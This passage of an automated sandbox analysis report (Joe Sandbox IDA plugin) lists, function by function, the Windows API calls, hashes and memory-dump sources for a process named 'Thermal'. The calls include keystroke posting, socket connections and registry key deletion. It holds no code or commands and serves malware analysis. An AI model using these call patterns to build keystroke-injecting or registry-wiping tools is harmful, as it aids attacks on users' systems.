                                                • Opcode Fuzzy Hash: 5b4598a9583a45f9e72876dd6cc976e97f4a6d0656ff9868b7d0675c16b1fdf7
                                                • Instruction Fuzzy Hash: 4A51E6A0A087D53DFB368234CC55BBA7EF96B06310F4C858AE0D556AD2D29CECD4E750
                                                APIs
                                                • GetParent.USER32(00000000), ref: 007D15A4
                                                • GetKeyboardState.USER32(?), ref: 007D15B9
                                                • SetKeyboardState.USER32(?), ref: 007D161A
                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007D1646
                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007D1663
                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007D16A7
                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007D16C8
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: ea1e52206ccfad14d78805792cf914220461a49275ddde805ebc18fe0435e1c5
                                                • Instruction ID: ed89db71611dc9ff5864626f7fbdb0926e2491b89b4d14172ccfdecd7455bd3d
                                                • Opcode Fuzzy Hash: ea1e52206ccfad14d78805792cf914220461a49275ddde805ebc18fe0435e1c5
                                                • Instruction Fuzzy Hash: 155117A06447D53DFB328724CC05BBA7EB96F46300F4C858AE0D546AC3DA9CEC98E750
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _wcsncpy$LocalTime
                                                • String ID:
                                                • API String ID: 2945705084-0
                                                • Opcode ID: c0f10438deca6fc2cd842b96706fc36df3dee9fe8f5192345bc501557834b886
                                                • Instruction ID: 47f579177196b83e7049db568dafdbd1fd097f7349d8ce4274e339b451a4b3c9
                                                • Opcode Fuzzy Hash: c0f10438deca6fc2cd842b96706fc36df3dee9fe8f5192345bc501557834b886
                                                • Instruction Fuzzy Hash: 71416076C20618B6CF11FBF4988E9CFB7B9AF04310F514856E519E3212E638A61687A6
                                                APIs
                                                  • Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D3B8A,?), ref: 007D4BE0
                                                  • Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D3B8A,?), ref: 007D4BF9
                                                • lstrcmpiW.KERNEL32(?,?), ref: 007D3BAA
                                                • _wcscmp.LIBCMT ref: 007D3BC6
                                                • MoveFileW.KERNEL32(?,?), ref: 007D3BDE
                                                • _wcscat.LIBCMT ref: 007D3C26
                                                • SHFileOperationW.SHELL32(?), ref: 007D3C92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                • String ID: \*.*
                                                • API String ID: 1377345388-1173974218
                                                • Opcode ID: 29a96ea2133567adb4d322aaa55130818c891a5ed50dd4d7bf933dabdbf67e0b
                                                • Instruction ID: 32cd4d23965c6f7f43f5c8fc64d65fda2503a3fd7c25bc6f7453218954bde14d
                                                • Opcode Fuzzy Hash: 29a96ea2133567adb4d322aaa55130818c891a5ed50dd4d7bf933dabdbf67e0b
                                                • Instruction Fuzzy Hash: 454160B1508344AAC752EB64D485ADBB7FCAF88340F40092FF489D3251EB38D6488B56
                                                APIs
                                                • _memset.LIBCMT ref: 007F78CF
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7976
                                                • IsMenu.USER32(?), ref: 007F798E
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F79D6
                                                • DrawMenuBar.USER32 ref: 007F79E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                • String ID: 0
                                                • API String ID: 3866635326-4108050209
                                                • Opcode ID: 9b84937e3bbfc74a6cf848616badf2131f83f449e2c2ea6a2a1a9e11f2d39089
                                                • Instruction ID: b5053c9088906a7f25f25ec42c712f945d437e04edf0b909306191ebc41a8573
                                                • Opcode Fuzzy Hash: 9b84937e3bbfc74a6cf848616badf2131f83f449e2c2ea6a2a1a9e11f2d39089
                                                • Instruction Fuzzy Hash: FF414871A08209EFDB24DF54D884EEABBB9FB05310F04812DEA55AB350C778AD50CFA0
                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007F1631
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F165B
                                                • FreeLibrary.KERNEL32(00000000), ref: 007F1712
                                                  • Part of subcall function 007F1602: RegCloseKey.ADVAPI32(?), ref: 007F1678
                                                  • Part of subcall function 007F1602: FreeLibrary.KERNEL32(?), ref: 007F16CA
                                                  • Part of subcall function 007F1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007F16ED
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 007F16B5
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                • String ID:
                                                • API String ID: 395352322-0
                                                • Opcode ID: a957959dad55fb92233fbfa8816d0eb8d6e2a7d7bdb6dff37159dfa72c4a8ea5
                                                • Instruction ID: f80912f82fda560e4262f456500c005c073323c414fb589e1f6a218901b70d8c
                                                • Opcode Fuzzy Hash: a957959dad55fb92233fbfa8816d0eb8d6e2a7d7bdb6dff37159dfa72c4a8ea5
                                                • Instruction Fuzzy Hash: DD311AB190110DFFDB14DB90DC89AFEB7BCEF08301F44016AEA05E2250EB789E459AA0
                                                APIs
                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007F6911
                                                • GetWindowLongW.USER32(00D85838,000000F0), ref: 007F6944
                                                • GetWindowLongW.USER32(00D85838,000000F0), ref: 007F6979
                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 007F69AB
                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 007F69D5
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007F69E6
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007F6A00
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LongWindow$MessageSend
                                                • String ID:
                                                • API String ID: 2178440468-0
                                                • Opcode ID: 9905bcaec64f1fce7cc58126199bcd714da8eee1face9c337169e4fba4dffcba
                                                • Instruction ID: 9deec4809277f2135de60aca1951426b4d8a31f0bdbdcb2d803a14088e7b46fa
                                                • Opcode Fuzzy Hash: 9905bcaec64f1fce7cc58126199bcd714da8eee1face9c337169e4fba4dffcba
                                                • Instruction Fuzzy Hash: 98310270604258AFDB21CF28DC88F6537E1FB8A711F1901A8F6548B2A2CBB6BC40DB50
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE2CA
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE2F0
                                                • SysAllocString.OLEAUT32(00000000), ref: 007CE2F3
                                                • SysAllocString.OLEAUT32(?), ref: 007CE311
                                                • SysFreeString.OLEAUT32(?), ref: 007CE31A
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 007CE33F
                                                • SysAllocString.OLEAUT32(?), ref: 007CE34D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: 3e63a1b029855bef14b5d893c659a3308ebf02a090df09afb3ad185d032b2213
                                                • Instruction ID: c64562b7536f5f5c4cf7d827267007630bb91ff98bdbbf829f2a3b34ba326a8f
                                                • Opcode Fuzzy Hash: 3e63a1b029855bef14b5d893c659a3308ebf02a090df09afb3ad185d032b2213
                                                • Instruction Fuzzy Hash: 9C21B732600609AFDF50DFA8DC88EBB77ACFB08360B04812DFA14DB250DA74AC418B64
                                                APIs
                                                  • Part of subcall function 007E8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E84A0
                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007E68B1
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E68C0
                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E68F9
                                                • connect.WSOCK32(00000000,?,00000010), ref: 007E6902
                                                • WSAGetLastError.WSOCK32 ref: 007E690C
                                                • closesocket.WSOCK32(00000000), ref: 007E6935
                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E694E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                • String ID:
                                                • API String ID: 910771015-0
                                                • Opcode ID: eccfa0057928f9e524b4a57985c23b6d2c4dd77c46c2408e775e5c409a0718db
                                                • Instruction ID: c9a373265cc015c344d66141ce262eab8e07b09e3e52805e535c6f80c8c290e8
                                                • Opcode Fuzzy Hash: eccfa0057928f9e524b4a57985c23b6d2c4dd77c46c2408e775e5c409a0718db
                                                • Instruction Fuzzy Hash: 0131A471600208EFDB109F65CC89BB977A9EB58765F048029F909A7291DB78AC048BA1
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE3A5
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE3CB
                                                • SysAllocString.OLEAUT32(00000000), ref: 007CE3CE
                                                • SysAllocString.OLEAUT32 ref: 007CE3EF
                                                • SysFreeString.OLEAUT32 ref: 007CE3F8
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 007CE412
                                                • SysAllocString.OLEAUT32(?), ref: 007CE420
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: 895496157be02096942d8368a1f107944a530a04a81dd4bd727728419f9c07d7
                                                • Instruction ID: 925619e9d7eeb667d46656aaa64e44d5341a38f975a7c7c1fb8bf50b29c5402e
                                                • Opcode Fuzzy Hash: 895496157be02096942d8368a1f107944a530a04a81dd4bd727728419f9c07d7
                                                • Instruction Fuzzy Hash: C7219835604205AFEB549FB8DC88EAF77ECFB08360B00812DF915CB261DA78ED418B64
                                                APIs
                                                  • Part of subcall function 00772111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
                                                  • Part of subcall function 00772111: GetStockObject.GDI32(00000011), ref: 00772163
                                                  • Part of subcall function 00772111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007F7C57
                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007F7C64
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007F7C6F
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007F7C7E
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007F7C8A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$CreateObjectStockWindow
                                                • String ID: Msctls_Progress32
                                                • API String ID: 1025951953-3636473452
                                                • Opcode ID: e635724a5d86c99fe2b7f11f05eb6c914c7eb72cb3b4f7117ddf52e5ebdb04f0
                                                • Instruction ID: 44100a3571fb5305afbf5c85835b3d90b318b4b21e46e9f19fce7edf4d7d9789
                                                • Opcode Fuzzy Hash: e635724a5d86c99fe2b7f11f05eb6c914c7eb72cb3b4f7117ddf52e5ebdb04f0
                                                • Instruction Fuzzy Hash: 9B1190B214021DBEEF158F60CC85EFB7F6EEF08798F014114BB08A2190DA769C21DBA0
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00794282,?), ref: 007941D3
                                                • GetProcAddress.KERNEL32(00000000), ref: 007941DA
                                                • EncodePointer.KERNEL32(00000000), ref: 007941E6
                                                • DecodePointer.KERNEL32(00000001,00794282,?), ref: 00794203
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoInitialize$combase.dll
                                                • API String ID: 3489934621-340411864
                                                • Opcode ID: 74d3506f3f9be15277b6e553b41b4ccde06ad00b167c04ec99902dea3833143e
                                                • Instruction ID: e76f06c3c6270ca5cb81658faec6e4916630ed6e19ecd53e6a429b89fbccd140
                                                • Opcode Fuzzy Hash: 74d3506f3f9be15277b6e553b41b4ccde06ad00b167c04ec99902dea3833143e
                                                • Instruction Fuzzy Hash: 0DE01A70690741AFEF911B70EC4DB293AA9B755B06F604824B911D51F4CBF940858F00
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007941A8), ref: 007942A8
                                                • GetProcAddress.KERNEL32(00000000), ref: 007942AF
                                                • EncodePointer.KERNEL32(00000000), ref: 007942BA
                                                • DecodePointer.KERNEL32(007941A8), ref: 007942D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoUninitialize$combase.dll
                                                • API String ID: 3489934621-2819208100
                                                • Opcode ID: 4dce3c010445c160c912bc076f0c97e7aa75ed326e3d70dbb35f718144b19438
                                                • Instruction ID: 73c10ee5443920a48a4df86cb26a2c73426d2166b8fac0fb237be9eaab7a1f80
                                                • Opcode Fuzzy Hash: 4dce3c010445c160c912bc076f0c97e7aa75ed326e3d70dbb35f718144b19438
                                                • Instruction Fuzzy Hash: CEE0E270AA0B00EFEF929F60ED0DF493AA8BB84B42F50491AF401E52F0CBB84604DF10
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 007721B8
                                                • GetWindowRect.USER32(?,?), ref: 007721F9
                                                • ScreenToClient.USER32(?,?), ref: 00772221
                                                • GetClientRect.USER32(?,?), ref: 00772350
                                                • GetWindowRect.USER32(?,?), ref: 00772369
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Rect$Client$Window$Screen
                                                • String ID:
                                                • API String ID: 1296646539-0
                                                • Opcode ID: 71a73744a5983a8f510bbac48105732f3db591594bf4ab43c75fee4cc763c2e6
                                                • Instruction ID: 5827d3ede4af3e7a94b387d5f6fd704febe272e12fa4b9a441f2f1005f3516c1
                                                • Opcode Fuzzy Hash: 71a73744a5983a8f510bbac48105732f3db591594bf4ab43c75fee4cc763c2e6
                                                • Instruction Fuzzy Hash: ADB17C39900249DBDF10CFA8C8807EDB7B1FF48350F14C129ED69AB256DB38AA51CB64
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memmove$__itow__swprintf
                                                • String ID:
                                                • API String ID: 3253778849-0
                                                • Opcode ID: d57812d9eae4f629e8e9f1010eb0a98c37f4e488a0d6ec2551e5fd4285420751
                                                • Instruction ID: 1254f15c8b12d485f667728a52ee4906b7ac48ca30353520c9300c192f5b4349
                                                • Opcode Fuzzy Hash: d57812d9eae4f629e8e9f1010eb0a98c37f4e488a0d6ec2551e5fd4285420751
                                                • Instruction Fuzzy Hash: DB61D27010025ADBCF11EF64CC89EFE37B8AF05344F44855AF8595B292DB39AD15CB60
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F091D
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F095D
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007F0980
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007F09A9
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007F09EC
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F09F9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                • String ID:
                                                • API String ID: 4046560759-0
                                                • Opcode ID: 7842d191d56e0cd22d9441b7921d50659661d221d8bcb6b4ebcbf213e2aa179e
                                                • Instruction ID: bede39900993e2392fba508e53c1539aeda91d857ee2b7110873f00f5628ad01
                                                • Opcode Fuzzy Hash: 7842d191d56e0cd22d9441b7921d50659661d221d8bcb6b4ebcbf213e2aa179e
                                                • Instruction Fuzzy Hash: D0516A31208204EFD714EF64C889E6EBBE9FF84314F44491DF595872A2EB79E905CB92
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 007CF6A2
                                                • VariantClear.OLEAUT32(00000013), ref: 007CF714
                                                • VariantClear.OLEAUT32(00000000), ref: 007CF76F
                                                • _memmove.LIBCMT ref: 007CF799
                                                • VariantClear.OLEAUT32(?), ref: 007CF7E6
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007CF814
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                • String ID:
                                                • API String ID: 1101466143-0
                                                • Opcode ID: 4aa03f397e6b4d60c4f0e630f04786a20c8010d9d5aa7b9106a650cb08d6ee1d
